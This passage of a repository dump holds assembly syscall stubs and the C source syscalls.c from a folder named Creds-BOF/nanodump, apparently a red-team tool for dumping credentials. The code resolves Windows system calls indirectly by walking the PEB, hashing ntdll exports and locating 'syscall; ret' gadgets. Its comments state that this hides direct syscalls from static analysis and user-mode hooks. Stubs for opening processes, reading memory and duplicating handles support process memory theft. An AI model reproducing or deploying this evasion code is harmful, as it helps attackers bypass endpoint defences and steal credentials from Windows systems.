	mov r10, rcx
	jmp r11
NtCreateKey ENDP

NtSetValueKey PROC
	mov [rsp +8], rcx
	mov [rsp+16], rdx
	mov [rsp+24], r8
	mov [rsp+32], r9
	mov rcx, 00A1F2D80h
	push rcx
	sub rsp, 028h
	call SW3_GetSyscallAddress
	add rsp, 028h
	pop rcx
	push rax
	sub rsp, 028h
	call SW2_GetSyscallNumber
	add rsp, 028h
	pop r11
	mov rcx, [rsp+8]
	mov rdx, [rsp+16]
	mov r8, [rsp+24]
	mov r9, [rsp+32]
	mov r10, rcx
	jmp r11
NtSetValueKey ENDP

NtQueryWnfStateNameInformation PROC
	mov [rsp +8], rcx
	mov [rsp+16], rdx
	mov [rsp+24], r8
	mov [rsp+32], r9
	mov rcx, 014823613h
	push rcx
	sub rsp, 028h
	call SW3_GetSyscallAddress
	add rsp, 028h
	pop rcx
	push rax
	sub rsp, 028h
	call SW2_GetSyscallNumber
	add rsp, 028h
	pop r11
	mov rcx, [rsp+8]
	mov rdx, [rsp+16]
	mov r8, [rsp+24]
	mov r9, [rsp+32]
	mov r10, rcx
	jmp r11
NtQueryWnfStateNameInformation ENDP

NtUpdateWnfStateData PROC
	mov [rsp +8], rcx
	mov [rsp+16], rdx
	mov [rsp+24], r8
	mov [rsp+32], r9
	mov rcx, 0E63DF28Ah
	push rcx
	sub rsp, 028h
	call SW3_GetSyscallAddress
	add rsp, 028h
	pop rcx
	push rax
	sub rsp, 028h
	call SW2_GetSyscallNumber
	add rsp, 028h
	pop r11
	mov rcx, [rsp+8]
	mov rdx, [rsp+16]
	mov r8, [rsp+24]
	mov r9, [rsp+32]
	mov r10, rcx
	jmp r11
NtUpdateWnfStateData ENDP

NtOpenEvent PROC
	mov [rsp +8], rcx
	mov [rsp+16], rdx
	mov [rsp+24], r8
	mov [rsp+32], r9
	mov rcx, 032A83D3Ah
	push rcx
	sub rsp, 028h
	call SW3_GetSyscallAddress
	add rsp, 028h
	pop rcx
	push rax
	sub rsp, 028h
	call SW2_GetSyscallNumber
	add rsp, 028h
	pop r11
	mov rcx, [rsp+8]
	mov rdx, [rsp+16]
	mov r8, [rsp+24]
	mov r9, [rsp+32]
	mov r10, rcx
	jmp r11
NtOpenEvent ENDP

NtAlpcConnectPort PROC
	mov [rsp +8], rcx
	mov [rsp+16], rdx
	mov [rsp+24], r8
	mov [rsp+32], r9
	mov rcx, 06AF3595Ch
	push rcx
	sub rsp, 028h
	call SW3_GetSyscallAddress
	add rsp, 028h
	pop rcx
	push rax
	sub rsp, 028h
	call SW2_GetSyscallNumber
	add rsp, 028h
	pop r11
	mov rcx, [rsp+8]
	mov rdx, [rsp+16]
	mov r8, [rsp+24]
	mov r9, [rsp+32]
	mov r10, rcx
	jmp r11
NtAlpcConnectPort ENDP

NtAlpcSendWaitReceivePort PROC
	mov [rsp +8], rcx
	mov [rsp+16], rdx
	mov [rsp+24], r8
	mov [rsp+32], r9
	mov rcx, 0E830236Eh
	push rcx
	sub rsp, 028h
	call SW3_GetSyscallAddress
	add rsp, 028h
	pop rcx
	push rax
	sub rsp, 028h
	call SW2_GetSyscallNumber
	add rsp, 028h
	pop r11
	mov rcx, [rsp+8]
	mov rdx, [rsp+16]
	mov r8, [rsp+24]
	mov r9, [rsp+32]
	mov r10, rcx
	jmp r11
NtAlpcSendWaitReceivePort ENDP

NtCreateThreadEx PROC
	mov [rsp +8], rcx
	mov [rsp+16], rdx
	mov [rsp+24], r8
	mov [rsp+32], r9
	mov rcx, 0113F55E3h
	push rcx
	sub rsp, 028h
	call SW3_GetSyscallAddress
	add rsp, 028h
	pop rcx
	push rax
	sub rsp, 028h
	call SW2_GetSyscallNumber
	add rsp, 028h
	pop r11
	mov rcx, [rsp+8]
	mov rdx, [rsp+16]
	mov r8, [rsp+24]
	mov r9, [rsp+32]
	mov r10, rcx
	jmp r11
NtCreateThreadEx ENDP

NtDeleteKey PROC
	mov [rsp +8], rcx
	mov [rsp+16], rdx
	mov [rsp+24], r8
	mov [rsp+32], r9
	mov rcx, 06BDA0E04h
	push rcx
	sub rsp, 028h
	call SW3_GetSyscallAddress
	add rsp, 028h
	pop rcx
	push rax
	sub rsp, 028h
	call SW2_GetSyscallNumber
	add rsp, 028h
	pop r11
	mov rcx, [rsp+8]
	mov rdx, [rsp+16]
	mov r8, [rsp+24]
	mov r9, [rsp+32]
	mov r10, rcx
	jmp r11
NtDeleteKey ENDP

NtPrivilegeCheck PROC
	mov [rsp +8], rcx
	mov [rsp+16], rdx
	mov [rsp+24], r8
	mov [rsp+32], r9
	mov rcx, 012B1DE10h
	push rcx
	sub rsp, 028h
	call SW3_GetSyscallAddress
	add rsp, 028h
	pop rcx
	push rax
	sub rsp, 028h
	call SW2_GetSyscallNumber
	add rsp, 028h
	pop r11
	mov rcx, [rsp+8]
	mov rdx, [rsp+16]
	mov r8, [rsp+24]
	mov r9, [rsp+32]
	mov r10, rcx
	jmp r11
NtPrivilegeCheck ENDP

NtCreateEvent PROC
	mov [rsp +8], rcx
	mov [rsp+16], rdx
	mov [rsp+24], r8
	mov [rsp+32], r9
	mov rcx, 010893520h
	push rcx
	sub rsp, 028h
	call SW3_GetSyscallAddress
	add rsp, 028h
	pop rcx
	push rax
	sub rsp, 028h
	call SW2_GetSyscallNumber
	add rsp, 028h
	pop r11
	mov rcx, [rsp+8]
	mov rdx, [rsp+16]
	mov r8, [rsp+24]
	mov r9, [rsp+32]
	mov r10, rcx
	jmp r11
NtCreateEvent ENDP

NtTerminateThread PROC
	mov [rsp +8], rcx
	mov [rsp+16], rdx
	mov [rsp+24], r8
	mov [rsp+32], r9
	mov rcx, 0381B3AB5h
	push rcx
	sub rsp, 028h
	call SW3_GetSyscallAddress
	add rsp, 028h
	pop rcx
	push rax
	sub rsp, 028h
	call SW2_GetSyscallNumber
	add rsp, 028h
	pop r11
	mov rcx, [rsp+8]
	mov rdx, [rsp+16]
	mov r8, [rsp+24]
	mov r9, [rsp+32]
	mov r10, rcx
	jmp r11
NtTerminateThread ENDP

_NtFsControlFile PROC
	mov [rsp +8], rcx
	mov [rsp+16], rdx
	mov [rsp+24], r8
	mov [rsp+32], r9
	mov rcx, 020C6D09Ch
	push rcx
	sub rsp, 028h
	call SW3_GetSyscallAddress
	add rsp, 028h
	pop rcx
	push rax
	sub rsp, 028h
	call SW2_GetSyscallNumber
	add rsp, 028h
	pop r11
	mov rcx, [rsp+8]
	mov rdx, [rsp+16]
	mov r8, [rsp+24]
	mov r9, [rsp+32]
	mov r10, rcx
	jmp r11
_NtFsControlFile ENDP

NtGetContextThread PROC
	mov [rsp +8], rcx
	mov [rsp+16], rdx
	mov [rsp+24], r8
	mov [rsp+32], r9
	mov rcx, 0BA9EF43Ch
	push rcx
	sub rsp, 028h
	call SW3_GetSyscallAddress
	add rsp, 028h
	pop rcx
	push rax
	sub rsp, 028h
	call SW2_GetSyscallNumber
	add rsp, 028h
	pop r11
	mov rcx, [rsp+8]
	mov rdx, [rsp+16]
	mov r8, [rsp+24]
	mov r9, [rsp+32]
	mov r10, rcx
	jmp r11
NtGetContextThread ENDP

NtSetContextThread PROC
	mov [rsp +8], rcx
	mov [rsp+16], rdx
	mov [rsp+24], r8
	mov [rsp+32], r9
	mov rcx, 0CB668D44h
	push rcx
	sub rsp, 028h
	call SW3_GetSyscallAddress
	add rsp, 028h
	pop rcx
	push rax
	sub rsp, 028h
	call SW2_GetSyscallNumber
	add rsp, 028h
	pop r11
	mov rcx, [rsp+8]
	mov rdx, [rsp+16]
	mov r8, [rsp+24]
	mov r9, [rsp+32]
	mov r10, rcx
	jmp r11
NtSetContextThread ENDP

NtResumeThread PROC
	mov [rsp +8], rcx
	mov [rsp+16], rdx
	mov [rsp+24], r8
	mov [rsp+32], r9
	mov rcx, 01339598Fh
	push rcx
	sub rsp, 028h
	call SW3_GetSyscallAddress
	add rsp, 028h
	pop rcx
	push rax
	sub rsp, 028h
	call SW2_GetSyscallNumber
	add rsp, 028h
	pop r11
	mov rcx, [rsp+8]
	mov rdx, [rsp+16]
	mov r8, [rsp+24]
	mov r9, [rsp+32]
	mov r10, rcx
	jmp r11
NtResumeThread ENDP

NtDelayExecution PROC
	mov [rsp +8], rcx
	mov [rsp+16], rdx
	mov [rsp+24], r8
	mov [rsp+32], r9
	mov rcx, 0B6EB75BAh
	push rcx
	sub rsp, 028h
	call SW3_GetSyscallAddress
	add rsp, 028h
	pop rcx
	push rax
	sub rsp, 028h
	call SW2_GetSyscallNumber
	add rsp, 028h
	pop r11
	mov rcx, [rsp+8]
	mov rdx, [rsp+16]
	mov r8, [rsp+24]
	mov r9, [rsp+32]
	mov r10, rcx
	jmp r11
NtDelayExecution ENDP

NtGetNextThread PROC
	mov [rsp +8], rcx
	mov [rsp+16], rdx
	mov [rsp+24], r8
	mov [rsp+32], r9
	mov rcx, 01BB0D9EFh
	push rcx
	sub rsp, 028h
	call SW3_GetSyscallAddress
	add rsp, 028h
	pop rcx
	push rax
	sub rsp, 028h
	call SW2_GetSyscallNumber
	add rsp, 028h
	pop r11
	mov rcx, [rsp+8]
	mov rdx, [rsp+16]
	mov r8, [rsp+24]
	mov r9, [rsp+32]
	mov r10, rcx
	jmp r11
NtGetNextThread ENDP

_NtQueryInformationThread PROC
	mov [rsp +8], rcx
	mov [rsp+16], rdx
	mov [rsp+24], r8
	mov [rsp+32], r9
	mov rcx, 00ACD84E7h
	push rcx
	sub rsp, 028h
	call SW3_GetSyscallAddress
	add rsp, 028h
	pop rcx
	push rax
	sub rsp, 028h
	call SW2_GetSyscallNumber
	add rsp, 028h
	pop r11
	mov rcx, [rsp+8]
	mov rdx, [rsp+16]
	mov r8, [rsp+24]
	mov r9, [rsp+32]
	mov r10, rcx
	jmp r11
_NtQueryInformationThread ENDP

NtOpenThread PROC
	mov [rsp +8], rcx
	mov [rsp+16], rdx
	mov [rsp+24], r8
	mov [rsp+32], r9
	mov rcx, 036960437h
	push rcx
	sub rsp, 028h
	call SW3_GetSyscallAddress
	add rsp, 028h
	pop rcx
	push rax
	sub rsp, 028h
	call SW2_GetSyscallNumber
	add rsp, 028h
	pop r11
	mov rcx, [rsp+8]
	mov rdx, [rsp+16]
	mov r8, [rsp+24]
	mov r9, [rsp+32]
	mov r10, rcx
	jmp r11
NtOpenThread ENDP

NtMapViewOfSection PROC
	mov [rsp +8], rcx
	mov [rsp+16], rdx
	mov [rsp+24], r8
	mov [rsp+32], r9
	mov rcx, 07A2D5C79h
	push rcx
	sub rsp, 028h
	call SW3_GetSyscallAddress
	add rsp, 028h
	pop rcx
	push rax
	sub rsp, 028h
	call SW2_GetSyscallNumber
	add rsp, 028h
	pop r11
	mov rcx, [rsp+8]
	mov rdx, [rsp+16]
	mov r8, [rsp+24]
	mov r9, [rsp+32]
	mov r10, rcx
	jmp r11
NtMapViewOfSection ENDP

NtUnmapViewOfSection PROC
	mov [rsp +8], rcx
	mov [rsp+16], rdx
	mov [rsp+24], r8
	mov [rsp+32], r9
	mov rcx, 0CA1ACC8Fh
	push rcx
	sub rsp, 028h
	call SW3_GetSyscallAddress
	add rsp, 028h
	pop rcx
	push rax
	sub rsp, 028h
	call SW2_GetSyscallNumber
	add rsp, 028h
	pop r11
	mov rcx, [rsp+8]
	mov rdx, [rsp+16]
	mov r8, [rsp+24]
	mov r9, [rsp+32]
	mov r10, rcx
	jmp r11
NtUnmapViewOfSection ENDP

NtImpersonateThread PROC
	mov [rsp +8], rcx
	mov [rsp+16], rdx
	mov [rsp+24], r8
	mov [rsp+32], r9
	mov rcx, 00C26D619h
	push rcx
	sub rsp, 028h
	call SW3_GetSyscallAddress
	add rsp, 028h
	pop rcx
	push rax
	sub rsp, 028h
	call SW2_GetSyscallNumber
	add rsp, 028h
	pop r11
	mov rcx, [rsp+8]
	mov rdx, [rsp+16]
	mov r8, [rsp+24]
	mov r9, [rsp+32]
	mov r10, rcx
	jmp r11
NtImpersonateThread ENDP

end


================================================
FILE: Creds-BOF/nanodump/source/syscalls.c
================================================
#include "syscalls.h"

// Code below is adapted from @modexpblog. Read linked article for more details.
// https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams

#if defined(_MSC_VER)
#if defined(BOF)
#pragma data_seg(".data")
#endif
SW2_SYSCALL_LIST SW2_SyscallList;
#if defined(BOF)
#pragma data_seg(".data")
#endif
#elif defined(__GNUC__) && defined(BOF)
SW2_SYSCALL_LIST SW2_SyscallList __attribute__ ((section(".data")));
#elif defined(__GNUC__)
SW2_SYSCALL_LIST SW2_SyscallList;
#endif
/*
 * If no 'syscall' instruction is found in NTDLL,
 * this function will be called.
 * By default just returns STATUS_NOT_FOUND.
 * The idea is to avoid having a 'syscall' instruction
 * on this program's .text section to evade static analysis
 */
#if defined(_MSC_VER) && defined (_M_IX86)

__declspec(naked) void SyscallNotFound(void)
{
    __asm {
        mov eax, 0xC0DEDEAD
        ret
    }
}

#elif defined(__GNUC__)

__declspec(naked) void SyscallNotFound(void)
{
    asm(
        SET_SYNTAX
        "mov eax, 0xC0DEDEAD \n"
        "ret \n"
    );
}
#endif

PVOID get_ntopenprocess_syscall_address(VOID)
{
    return SW3_GetSyscallAddress(ZwOpenProcess_SW2_HASH);
}

/*
 * the idea here is to find a 'syscall' instruction in 'ntdll.dll'
 * so that we can call it from our code and try to hide the fact
 * that we use direct syscalls
 */
PVOID GetSyscallAddress(
    IN PVOID nt_api_address,
    IN ULONG32 size_of_ntapi)
{
    PVOID syscall_address = NULL;
#ifdef _WIN64
    BYTE syscall_code[] = { 0x0f, 0x05, 0xc3 };
#else
    BYTE syscall_code[] = { 0x0f, 0x34, 0xc3 };
#endif

    // we will loook for a syscall;ret up to the end of the api
    ULONG32 max_look_range = size_of_ntapi - sizeof(syscall_code) + 1;

#ifdef _M_IX86
    if (local_is_wow64())
    {
        // if we are a WoW64 process, jump to WOW32Reserved
        syscall_address = (PVOID)READ_MEMLOC(0xc0);
        return syscall_address;
    }
#endif

    for (ULONG32 offset = 0; offset < max_look_range; offset++)
    {
        // we don't really care if there is a 'jmp' between
        // nt_api_address and the 'syscall; ret' instructions
        syscall_address = SW2_RVA2VA(PVOID, nt_api_address, offset);

        if (!memcmp((PVOID)syscall_code, syscall_address, sizeof(syscall_code)))
        {
            // we can use the original code for this system call :)
            return syscall_address;
        }
    }

    // the 'syscall; ret' intructions have not been found,
    // we will try to use one near it, similarly to HalosGate

    for (ULONG32 num_jumps = 1; num_jumps < SW2_MAX_ENTRIES; num_jumps++)
    {
        // let's try with an Nt* API below our syscall
        for (ULONG32 offset = 0; offset < max_look_range; offset++)
        {
            syscall_address = SW2_RVA2VA(
                PVOID,
                nt_api_address,
                offset + num_jumps * size_of_ntapi);
            if (!memcmp((PVOID)syscall_code, syscall_address, sizeof(syscall_code)))
                return syscall_address;
        }

        // let's try with an Nt* API above our syscall
        for (ULONG32 offset = 0; offset < max_look_range; offset++)
        {
            syscall_address = SW2_RVA2VA(
                PVOID,
                nt_api_address,
                offset - num_jumps * size_of_ntapi);
            if (!memcmp((PVOID)syscall_code, syscall_address, sizeof(syscall_code)))
                return syscall_address;
        }
    }

    return SyscallNotFound;
}

DWORD SW2_HashSyscall(
    IN PCSTR FunctionName)
{
    DWORD i = 0;
    DWORD Hash = SW2_SEED;

    while (FunctionName[i])
    {
        WORD PartialName = *(WORD*)((ULONG_PTR)FunctionName + i++);
        Hash ^= PartialName + SW2_ROR8(Hash);
    }

    return Hash;
}

BOOL SW2_PopulateSyscallList(VOID)
{
    // Return early if the list is already populated.
    if (SW2_SyscallList.Count) return TRUE;

    PSW2_PEB Peb = (PSW2_PEB)READ_MEMLOC(PEB_OFFSET);
    PSW2_PEB_LDR_DATA Ldr = Peb->Ldr;
    PIMAGE_EXPORT_DIRECTORY ExportDirectory = NULL;
    PVOID DllBase = NULL;

    // Get the DllBase address of NTDLL.dll. NTDLL is not guaranteed to be the second
    // in the list, so it's safer to loop through the full list and find it.
    PSW2_LDR_DATA_TABLE_ENTRY LdrEntry;
    for (LdrEntry = (PSW2_LDR_DATA_TABLE_ENTRY)Ldr->Reserved2[1]; LdrEntry->DllBase != NULL; LdrEntry = (PSW2_LDR_DATA_TABLE_ENTRY)LdrEntry->Reserved1[0])
    {
        DllBase = LdrEntry->DllBase;
        PIMAGE_DOS_HEADER DosHeader = (PIMAGE_DOS_HEADER)DllBase;
        PIMAGE_NT_HEADERS NtHeaders = SW2_RVA2VA(PIMAGE_NT_HEADERS, DllBase, DosHeader->e_lfanew);
        PIMAGE_DATA_DIRECTORY DataDirectory = (PIMAGE_DATA_DIRECTORY)NtHeaders->OptionalHeader.DataDirectory;
        DWORD VirtualAddress = DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
        if (VirtualAddress == 0) continue;

        ExportDirectory = SW2_RVA2VA(PIMAGE_EXPORT_DIRECTORY, DllBase, VirtualAddress);

        // If this is NTDLL.dll, exit loop.
        PCHAR DllName = SW2_RVA2VA(PCHAR, DllBase, ExportDirectory->Name);
        if ((*(ULONG*)DllName | 0x20202020) != 0x6c64746e) continue;
        if ((*(ULONG*)(DllName + 4) | 0x20202020) == 0x6c642e6c) break;
    }

    if (!ExportDirectory) return FALSE;

    DWORD NumberOfNames = ExportDirectory->NumberOfNames;
    PDWORD Functions = SW2_RVA2VA(PDWORD, DllBase, ExportDirectory->AddressOfFunctions);
    PDWORD Names = SW2_RVA2VA(PDWORD, DllBase, ExportDirectory->AddressOfNames);
    PWORD Ordinals = SW2_RVA2VA(PWORD, DllBase, ExportDirectory->AddressOfNameOrdinals);

    // Populate SW2_SyscallList with unsorted Zw* entries.
    DWORD i = 0;
    PSW2_SYSCALL_ENTRY Entries = SW2_SyscallList.Entries;
    do
    {
        PCHAR FunctionName = SW2_RVA2VA(PCHAR, DllBase, Names[NumberOfNames - 1]);

        // Is this a system call?
        if (*(USHORT*)FunctionName == 0x775a)
        {
            Entries[i].Hash = SW2_HashSyscall(FunctionName);
            Entries[i].Address = Functions[Ordinals[NumberOfNames - 1]];

            i++;
            if (i == SW2_MAX_ENTRIES) break;
        }
    } while (--NumberOfNames);

    // Save total number of system calls found.
    SW2_SyscallList.Count = i;

    // Sort the list by address in ascending order.
    for (i = 0; i < SW2_SyscallList.Count - 1; i++)
    {
        for (DWORD j = 0; j < SW2_SyscallList.Count - i - 1; j++)
        {
            if (Entries[j].Address > Entries[j + 1].Address)
            {
                // Swap entries.
                SW2_SYSCALL_ENTRY TempEntry = { 0 };

                TempEntry.Hash = Entries[j].Hash;
                TempEntry.Address = Entries[j].Address;

                Entries[j].Hash = Entries[j + 1].Hash;
                Entries[j].Address = Entries[j + 1].Address;

                Entries[j + 1].Hash = TempEntry.Hash;
                Entries[j + 1].Address = TempEntry.Address;
            }
        }
    }

    // we need to know this in order to better search for syscall ids
    ULONG size_of_ntapi = Entries[1].Address - Entries[0].Address;

    // finally calculate the address of each syscall
    for (i = 0; i < SW2_SyscallList.Count - 1; i++)
    {
        PVOID nt_api_address = SW2_RVA2VA(PVOID, DllBase, Entries[i].Address);
        Entries[i].SyscallAddress = GetSyscallAddress(nt_api_address, size_of_ntapi);
    }

    return TRUE;
}

EXTERN_C DWORD SW2_GetSyscallNumber(
    IN DWORD FunctionHash)
{
    if (!SW2_PopulateSyscallList())
    {
        DPRINT_ERR("SW2_PopulateSyscallList failed");
        return 0;
    }

    for (DWORD i = 0; i < SW2_SyscallList.Count; i++)
    {
        if (FunctionHash == SW2_SyscallList.Entries[i].Hash)
        {
            return i;
        }
    }
    DPRINT_ERR("syscall with hash 0x%lx not found", FunctionHash);
    return 0;
}

EXTERN_C PVOID SW3_GetSyscallAddress(
    IN DWORD FunctionHash)
{
    if (!SW2_PopulateSyscallList())
    {
        DPRINT_ERR("SW2_PopulateSyscallList failed");
        return NULL;
    }

    for (DWORD i = 0; i < SW2_SyscallList.Count; i++)
    {
        if (FunctionHash == SW2_SyscallList.Entries[i].Hash)
        {
            return SW2_SyscallList.Entries[i].SyscallAddress;
        }
    }
    DPRINT_ERR("syscall with hash 0x%lx not found", FunctionHash);
    return NULL;
}

#if defined(_MSC_VER) && defined (_M_IX86)

__declspec(naked) BOOL local_is_wow64(void)
{
    __asm {
        mov eax, fs:[0xc0]
        test eax, eax
        jne wow64
        mov eax, 0
        ret
        wow64:
        mov eax, 1
        ret
    }
}

__declspec(naked) PVOID getIP(void)
{
    __asm {
        mov eax, [esp]
        ret
    }
}

__declspec(naked) NTSTATUS NtOpenProcess(
    OUT PHANDLE ProcessHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes,
    IN PCLIENT_ID ClientId OPTIONAL)
{
    __asm {
        push 0xCD9B2A0F
        call SW3_GetSyscallAddress
        pop ebx
        push eax
        push ebx
        call SW2_GetSyscallNumber
        add esp, 4
        pop ebx
        mov edx, esp
        sub edx, 4
        call ebx
        ret
    }
}

__declspec(naked) NTSTATUS NtGetNextProcess(
    IN HANDLE ProcessHandle,
    IN ACCESS_MASK DesiredAccess,
    IN ULONG HandleAttributes,
    IN ULONG Flags,
    OUT PHANDLE NewProcessHandle)
{
    __asm {
        push 0xFFBF1A2F
        call SW3_GetSyscallAddress
        pop ebx
        push eax
        push ebx
        call SW2_GetSyscallNumber
        add esp, 4
        pop ebx
        mov edx, esp
        sub edx, 4
        call ebx
        ret
    }
}

__declspec(naked) NTSTATUS NtReadVirtualMemory(
    IN HANDLE ProcessHandle,
    IN PVOID BaseAddress,
    OUT PVOID Buffer,
    IN SIZE_T BufferSize,
    OUT PSIZE_T NumberOfBytesRead OPTIONAL)
{
    __asm {
        push 0x118B7567
        call SW3_GetSyscallAddress
        pop ebx
        push eax
        push ebx
        call SW2_GetSyscallNumber
        add esp, 4
        pop ebx
        mov edx, esp
        sub edx, 4
        call ebx
        ret
    }
}

__declspec(naked) NTSTATUS NtClose(
    IN HANDLE Handle)
{
    __asm {
        push 0x2252D33F
        call SW3_GetSyscallAddress
        pop ebx
        push eax
        push ebx
        call SW2_GetSyscallNumber
        add esp, 4
        pop ebx
        mov edx, esp
        sub edx, 4
        call ebx
        ret
    }
}

__declspec(naked) NTSTATUS NtOpenProcessToken(
    IN HANDLE ProcessHandle,
    IN ACCESS_MASK DesiredAccess,
    OUT PHANDLE TokenHandle)
{
    __asm {
        push 0x8FA915A2
        call SW3_GetSyscallAddress
        pop ebx
        push eax
        push ebx
        call SW2_GetSyscallNumber
        add esp, 4
        pop ebx
        mov edx, esp
        sub edx, 4
        call ebx
        ret
    }
}

__declspec(naked) NTSTATUS NtQueryInformationProcess(
    IN HANDLE ProcessHandle,
    IN PROCESSINFOCLASS ProcessInformationClass,
    OUT PVOID ProcessInformation,
    IN ULONG ProcessInformationLength,
    OUT PULONG ReturnLength OPTIONAL)
{
    __asm {
        push 0xBDBCBC20
        call SW3_GetSyscallAddress
        pop ebx
        push eax
        push ebx
        call SW2_GetSyscallNumber
        add esp, 4
        pop ebx
        mov edx, esp
        sub edx, 4
        call ebx
        ret
    }
}

__declspec(naked) NTSTATUS NtQueryVirtualMemory(
    IN HANDLE ProcessHandle,
    IN PVOID BaseAddress,
    IN MEMORY_INFORMATION_CLASS MemoryInformationClass,
    OUT PVOID MemoryInformation,
    IN SIZE_T MemoryInformationLength,
    OUT PSIZE_T ReturnLength OPTIONAL)
{
    __asm {
        push 0x0393E980
        call SW3_GetSyscallAddress
        pop ebx
        push eax
        push ebx
        call SW2_GetSyscallNumber
        add esp, 4
        pop ebx
        mov edx, esp
        sub edx, 4
        call ebx
        ret
    }
}

__declspec(naked) NTSTATUS NtAdjustPrivilegesToken(
    IN HANDLE TokenHandle,
    IN BOOLEAN DisableAllPrivileges,
    IN PTOKEN_PRIVILEGES NewState OPTIONAL,
    IN ULONG BufferLength,
    OUT PTOKEN_PRIVILEGES PreviousState OPTIONAL,
    OUT PULONG ReturnLength OPTIONAL)
{
    __asm {
        push 0x17AB1B32
        call SW3_GetSyscallAddress
        pop ebx
        push eax
        push ebx
        call SW2_GetSyscallNumber
        add esp, 4
        pop ebx
        mov edx, esp
        sub edx, 4
        call ebx
        ret
    }
}

__declspec(naked) NTSTATUS NtAllocateVirtualMemory(
    IN HANDLE ProcessHandle,
    IN OUT PVOID * BaseAddress,
    IN ULONG ZeroBits,
    IN OUT PSIZE_T RegionSize,
    IN ULONG AllocationType,
    IN ULONG Protect)
{
    __asm {
        push 0x0595031B
        call SW3_GetSyscallAddress
        pop ebx
        push eax
        push ebx
        call SW2_GetSyscallNumber
        add esp, 4
        pop ebx
        mov edx, esp
        sub edx, 4
        call ebx
        ret
    }
}

__declspec(naked) NTSTATUS NtFreeVirtualMemory(
    IN HANDLE ProcessHandle,
    IN OUT PVOID * BaseAddress,
    IN OUT PSIZE_T RegionSize,
    IN ULONG FreeType)
{
    __asm {
        push 0x01932F05
        call SW3_GetSyscallAddress
        pop ebx
        push eax
        push ebx
        call SW2_GetSyscallNumber
        add esp, 4
        pop ebx
        mov edx, esp
        sub edx, 4
        call ebx
        ret
    }
}

__declspec(naked) NTSTATUS NtCreateFile(
    OUT PHANDLE FileHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes,
    OUT PIO_STATUS_BLOCK IoStatusBlock,
    IN PLARGE_INTEGER AllocationSize OPTIONAL,
    IN ULONG FileAttributes,
    IN ULONG ShareAccess,
    IN ULONG CreateDisposition,
    IN ULONG CreateOptions,
    IN PVOID EaBuffer OPTIONAL,
    IN ULONG EaLength)
{
    __asm {
        push 0x96018EB6
        call SW3_GetSyscallAddress
        pop ebx
        push eax
        push ebx
        call SW2_GetSyscallNumber
        add esp, 4
        pop ebx
        mov edx, esp
        sub edx, 4
        call ebx
        ret
    }
}

__declspec(naked) NTSTATUS NtWriteFile(
    IN HANDLE FileHandle,
    IN HANDLE Event OPTIONAL,
    IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
    IN PVOID ApcContext OPTIONAL,
    OUT PIO_STATUS_BLOCK IoStatusBlock,
    IN PVOID Buffer,
    IN ULONG Length,
    IN PLARGE_INTEGER ByteOffset OPTIONAL,
    IN PULONG Key OPTIONAL)
{
    __asm {
        push 0x24B22A1A
        call SW3_GetSyscallAddress
        pop ebx
        push eax
        push ebx
        call SW2_GetSyscallNumber
        add esp, 4
        pop ebx
        mov edx, esp
        sub edx, 4
        call ebx
        ret
    }
}

__declspec(naked) NTSTATUS NtCreateProcessEx(
    OUT PHANDLE ProcessHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
    IN HANDLE ParentProcess,
    IN ULONG Flags,
    IN HANDLE SectionHandle OPTIONAL,
    IN HANDLE DebugPort OPTIONAL,
    IN HANDLE ExceptionPort OPTIONAL,
    IN ULONG JobMemberLevel)
{
    __asm {
        push 0x1198E2E3
        call SW3_GetSyscallAddress
        pop ebx
        push eax
        push ebx
        call SW2_GetSyscallNumber
        add esp, 4
        pop ebx
        mov edx, esp
        sub edx, 4
        call ebx
        ret
    }
}

__declspec(naked) NTSTATUS NtQuerySystemInformation(
    IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
    IN OUT PVOID SystemInformation,
    IN ULONG SystemInformationLength,
    OUT PULONG ReturnLength OPTIONAL)
{
    __asm {
        push 0x4A5B2C8F
        call SW3_GetSyscallAddress
        pop ebx
        push eax
        push ebx
        call SW2_GetSyscallNumber
        add esp, 4
        pop ebx
        mov edx, esp
        sub edx, 4
        call ebx
        ret
    }
}

__declspec(naked) NTSTATUS NtDuplicateObject(
    IN HANDLE SourceProcessHandle,
    IN HANDLE SourceHandle,
    IN HANDLE TargetProcessHandle OPTIONAL,
    OUT PHANDLE TargetHandle OPTIONAL,
    IN ACCESS_MASK DesiredAccess,
    IN ULONG HandleAttributes,
    IN ULONG Options)
{
    __asm {
        push 0x9CBFA413
        call SW3_GetSyscallAddress
        pop ebx
        push eax
        push ebx
        call SW2_GetSyscallNumber
        add esp, 4
        pop ebx
        mov edx, esp
        sub edx, 4
        call ebx
        ret
    }
}

__declspec(naked) NTSTATUS NtQueryObject_(
    IN HANDLE Handle,
    IN OBJECT_INFORMATION_CLASS ObjectInformationClass,
    OUT PVOID ObjectInformation OPTIONAL,
    IN ULONG ObjectInformationLength,
    OUT PULONG ReturnLength OPTIONAL)
{
    __asm {
        push 0x0E23F64F
        call SW3_GetSyscallAddress
        pop ebx
        push eax
        push ebx
        call SW2_GetSyscallNumber
        add esp, 4
        pop ebx
        mov edx, esp
        sub edx, 4
        call ebx
        ret
    }
}

__declspec(naked) NTSTATUS NtWaitForSingleObject(
    IN HANDLE ObjectHandle,
    IN BOOLEAN Alertable,
    IN PLARGE_INTEGER TimeOut OPTIONAL)
{
    __asm {
        push 0x426376E3
        call SW3_GetSyscallAddress
        pop ebx
        push eax
        push ebx
        call SW2_GetSyscallNumber
        add esp, 4
        pop ebx
        mov edx, esp
        sub edx, 4
        call ebx
        ret
    }
}

__declspec(naked) NTSTATUS NtDeleteFile(
    IN POBJECT_ATTRIBUTES ObjectAttributes)
{
    __asm {
        push 0x64B26A1A
        call SW3_GetSyscallAddress
        pop ebx
        push eax
        push ebx
        call SW2_GetSyscallNumber
        add esp, 4
        pop ebx
        mov edx, esp
        sub edx, 4
        call ebx
        ret
    }
}

__declspec(naked) NTSTATUS NtTerminateProcess(
    IN HANDLE ProcessHandle OPTIONAL,
    IN NTSTATUS ExitStatus)
{
    __asm {
        push 0x652E64A0
        call SW3_GetSyscallAddress
        pop ebx
        push eax
        push ebx
        call SW2_GetSyscallNumber
        add esp, 4
        pop ebx
        mov edx, esp
        sub edx, 4
        call ebx
        ret
    }
}

